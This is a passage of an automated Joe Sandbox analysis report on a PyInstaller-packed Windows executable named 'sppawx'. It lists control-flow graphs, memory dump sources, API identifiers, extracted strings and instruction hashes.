7ff79a313e5a 803->807 819 7ff79a313e8e-7ff79a313e95 806->819 820 7ff79a313e85-7ff79a313e8c 806->820 807->767 823 7ff79a313e97-7ff79a313ea4 call 7ff79a316df0 819->823 824 7ff79a313eaf-7ff79a313eb9 call 7ff79a3171a0 819->824 822 7ff79a313edb-7ff79a313ef0 call 7ff79a312a50 call 7ff79a316fb0 call 7ff79a316d60 820->822 822->767 823->824 835 7ff79a313ea6-7ff79a313ead 823->835 836 7ff79a313ebb-7ff79a313ec2 824->836 837 7ff79a313ec4-7ff79a313ed2 call 7ff79a3174e0 824->837 835->822 836->822 837->767 847 7ff79a313ed4 837->847 841->752 842->841 851 7ff79a313fb5-7ff79a313fca 842->851 847->822 852 7ff79a313fcc-7ff79a313fdf call 7ff79a312710 call 7ff79a311900 851->852 853 7ff79a313fe4 call 7ff79a312a50 851->853 852->752 853->841
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                              • Instruction ID: 0cf9c1b22694ffbcbc11b5977d8b8f83a031d1d6c560bfee3f93159889580c1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35329A22E0E68291FAB5FB3194543B9F6A1AF44784FC540BEDA4D432D6EF2CE559C320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1500 7ff79a3369d4-7ff79a336a47 call 7ff79a336708 1503 7ff79a336a49-7ff79a336a52 call 7ff79a324f58 1500->1503 1504 7ff79a336a61-7ff79a336a6b call 7ff79a328590 1500->1504 1511 7ff79a336a55-7ff79a336a5c call 7ff79a324f78 1503->1511 1509 7ff79a336a6d-7ff79a336a84 call 7ff79a324f58 call 7ff79a324f78 1504->1509 1510 7ff79a336a86-7ff79a336aef CreateFileW 1504->1510 1509->1511 1513 7ff79a336b6c-7ff79a336b77 GetFileType 1510->1513 1514 7ff79a336af1-7ff79a336af7 1510->1514 1522 7ff79a336da2-7ff79a336dc2 1511->1522 1517 7ff79a336b79-7ff79a336bb4 GetLastError call 7ff79a324eec CloseHandle 1513->1517 1518 7ff79a336bca-7ff79a336bd1 1513->1518 1520 7ff79a336b39-7ff79a336b67 GetLastError call 7ff79a324eec 1514->1520 1521 7ff79a336af9-7ff79a336afd 1514->1521 1517->1511 1534 7ff79a336bba-7ff79a336bc5 call 7ff79a324f78 1517->1534 1525 7ff79a336bd9-7ff79a336bdc 1518->1525 1526 7ff79a336bd3-7ff79a336bd7 1518->1526 1520->1511 1521->1520 1527 7ff79a336aff-7ff79a336b37 CreateFileW 1521->1527 1531 7ff79a336be2-7ff79a336c37 call 7ff79a3284a8 1525->1531 1532 7ff79a336bde 1525->1532 1526->1531 1527->1513 1527->1520 1539 7ff79a336c39-7ff79a336c45 call 7ff79a336910 1531->1539 1540 7ff79a336c56-7ff79a336c87 call 7ff79a336488 1531->1540 1532->1531 1534->1511 1539->1540 1545 7ff79a336c47 1539->1545 1546 7ff79a336c89-7ff79a336c8b 1540->1546 1547 7ff79a336c8d-7ff79a336ccf 1540->1547 1548 7ff79a336c49-7ff79a336c51 call 7ff79a32ab30 1545->1548 1546->1548 1549 7ff79a336cf1-7ff79a336cfc 1547->1549 1550 7ff79a336cd1-7ff79a336cd5 1547->1550 1548->1522 1553 7ff79a336d02-7ff79a336d06 1549->1553 1554 7ff79a336da0 1549->1554 1550->1549 1552 7ff79a336cd7-7ff79a336cec 1550->1552 1552->1549 1553->1554 1556 7ff79a336d0c-7ff79a336d51 CloseHandle CreateFileW 1553->1556 1554->1522 1557 7ff79a336d86-7ff79a336d9b 1556->1557 1558 7ff79a336d53-7ff79a336d81 GetLastError call 7ff79a324eec call 7ff79a3286d0 1556->1558 1557->1554 1558->1557
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: 5f82996227fa5378870b2b28f75933b8870d17b2b7b8c67f920999bd86a178dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81C1CF32F29A418AFB24EF79C4902AD7761EB49B98B81526DDF2E57794CF38D011C310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: TLS 1.1
                                                                                                                                                                                                                              • API String ID: 3300690313-2459780185
                                                                                                                                                                                                                              • Opcode ID: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
                                                                                                                                                                                                                              • Instruction ID: 6bd55460f0bcf0bba073dd75793f2eae90d25dfcde3a2fb10ac1e764cca323e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1262252272819286E7158E3CD44027D76A2F7487C5F285536EF9EC3BD4EA3CEA46CB11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                              • API String ID: 3568877910-4201244970
                                                                                                                                                                                                                              • Opcode ID: 670a7a8c497eb5fd3f2ff43fc5247f21d9589723c58f9e3c3d7439a388d8b803
                                                                                                                                                                                                                              • Instruction ID: 51aa6546d4a4055eca8f81a6de8855747215f3e647f84760fcd1cc111035af43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 670a7a8c497eb5fd3f2ff43fc5247f21d9589723c58f9e3c3d7439a388d8b803
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C327B22A0968686EB758F2594403BDB7A5FF84B94F0C5236CA6E47BE4EF3CE454C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                              • API String ID: 3568877910-1046679716
                                                                                                                                                                                                                              • Opcode ID: 0ccca2f0d9bf7c621ae046b7d29a199d906cdf17e38475c7e203808ad0232101
                                                                                                                                                                                                                              • Instruction ID: 3c35edb6e1d127ea978751e9fa5c442df8cd75b0284f9a4fd6aba40524fc28cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ccca2f0d9bf7c621ae046b7d29a199d906cdf17e38475c7e203808ad0232101
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF16D22A0D68286EB758F21D4547FEABA0FB85B98F0C4136DA4D07BE5EF7CE4458740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: a328c044abde94c790c807ec7476a3d4486e064cae7c39ffa82a3e6146d7cc39
                                                                                                                                                                                                                              • Instruction ID: 67cddd7bb7404903284919182ad74329f3f367e945b6b2bd4517bdb6082e968a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a328c044abde94c790c807ec7476a3d4486e064cae7c39ffa82a3e6146d7cc39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB62572262819287E7258F38D4403BD77A1F788785F085532EA9EC7BE4FA7CEA55D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: bind
                                                                                                                                                                                                                              • String ID: bind$socket.bind
                                                                                                                                                                                                                              • API String ID: 1187836755-187351271
                                                                                                                                                                                                                              • Opcode ID: b44409763409b1b195a08de1e49c4d77a00137f7db31770aa5edf6614f75523b
                                                                                                                                                                                                                              • Instruction ID: 1741bd5ef47b6a84126fa2ca48f8dd2d228cdd9625ffd4ce85a034482aba0ab2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b44409763409b1b195a08de1e49c4d77a00137f7db31770aa5edf6614f75523b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C11EA21A08B82A1EB309B51F8403AEA364FFC9BA1F481137DA4D57F64FF2CE5458B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007D5630
                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                              • API String ID: 155963650-2920599690
                                                                                                                                                                                                                              • Opcode ID: 2e1d838c8e07f69dc28e0a255225248a6f1770488a93a18e233a608de4c13702
                                                                                                                                                                                                                              • Instruction ID: 1288a736c9f90fd5c50db87c8844d3eb5066d7ad9f8887e4d88ab51c77cf2687
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1d838c8e07f69dc28e0a255225248a6f1770488a93a18e233a608de4c13702
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14429222A0978682EB768F25D55037D67A8FF95B84F094236DA4D47BB8EF7CE494C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: 34a9221a88493ed2c2ef344eeacc4a411f978b4c18ae2030bd93ff780e9f6f3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F04422A1A64186F7709F70B489766B390BB84768F84067DEAAD026D4DF7CD0498A10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                              • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                              • Instruction ID: 339eab55d07bbda672c5581a98e66316ffcde07da1c70f83c46b4320ba355502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2A1E720E4AB4782EE758B45A5502BC63A8FFA5B80F1C1637C91D06FF5FF6CA5948300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                              • Opcode ID: a84784d5baf149632b74e46f2c3d80672b82a35a91410d9067c1fd2c4abcf944
                                                                                                                                                                                                                              • Instruction ID: 00ebecc4874a559c29769156c88b486363c62e7b84642af6afea35be799f35e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a84784d5baf149632b74e46f2c3d80672b82a35a91410d9067c1fd2c4abcf944
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0E012B1B0064582DB689B19D45123963A0F748F75F245735DE3D8B7D0DE28D8E1C740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 859 7ff79a311950-7ff79a31198b call 7ff79a3145b0 862 7ff79a311c4e-7ff79a311c72 call 7ff79a31c5c0 859->862 863 7ff79a311991-7ff79a3119d1 call 7ff79a317f80 859->863 868 7ff79a3119d7-7ff79a3119e7 call 7ff79a320744 863->868 869 7ff79a311c3b-7ff79a311c3e call 7ff79a3200bc 863->869 874 7ff79a311a08-7ff79a311a24 call 7ff79a32040c 868->874 875 7ff79a3119e9-7ff79a311a03 call 7ff79a324f78 call 7ff79a312910 868->875 873 7ff79a311c43-7ff79a311c4b 869->873 873->862 881 7ff79a311a45-7ff79a311a5a call 7ff79a324f98 874->881 882 7ff79a311a26-7ff79a311a40 call 7ff79a324f78 call 7ff79a312910 874->882 875->869 889 7ff79a311a7b-7ff79a311afc call 7ff79a311c80 * 2 call 7ff79a320744 881->889 890 7ff79a311a5c-7ff79a311a76 call 7ff79a324f78 call 7ff79a312910 881->890 882->869 901 7ff79a311b01-7ff79a311b14 call 7ff79a324fb4 889->901 890->869 904 7ff79a311b35-7ff79a311b4e call 7ff79a32040c 901->904 905 7ff79a311b16-7ff79a311b30 call 7ff79a324f78 call 7ff79a312910 901->905 911 7ff79a311b6f-7ff79a311b8b call 7ff79a320180 904->911 912 7ff79a311b50-7ff79a311b6a call 7ff79a324f78 call 7ff79a312910 904->912 905->869 919 7ff79a311b8d-7ff79a311b99 call 7ff79a312710 911->919 920 7ff79a311b9e-7ff79a311bac 911->920 912->869 919->869 920->869 923 7ff79a311bb2-7ff79a311bb9 920->923 925 7ff79a311bc1-7ff79a311bc7 923->925 926 7ff79a311bc9-7ff79a311bd6 925->926 927 7ff79a311be0-7ff79a311bef 925->927 928 7ff79a311bf1-7ff79a311bfa 926->928 927->927 927->928 929 7ff79a311bfc-7ff79a311bff 928->929 930 7ff79a311c0f 928->930 929->930 932 7ff79a311c01-7ff79a311c04 929->932 931 7ff79a311c11-7ff79a311c24 930->931 934 7ff79a311c2d-7ff79a311c39 931->934 935 7ff79a311c26 931->935 932->930 933 7ff79a311c06-7ff79a311c09 932->933 933->930 936 7ff79a311c0b-7ff79a311c0d 933->936 934->869 934->925 935->934 936->931
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A317F80: _fread_nolock.LIBCMT ref: 00007FF79A31802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF79A311A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
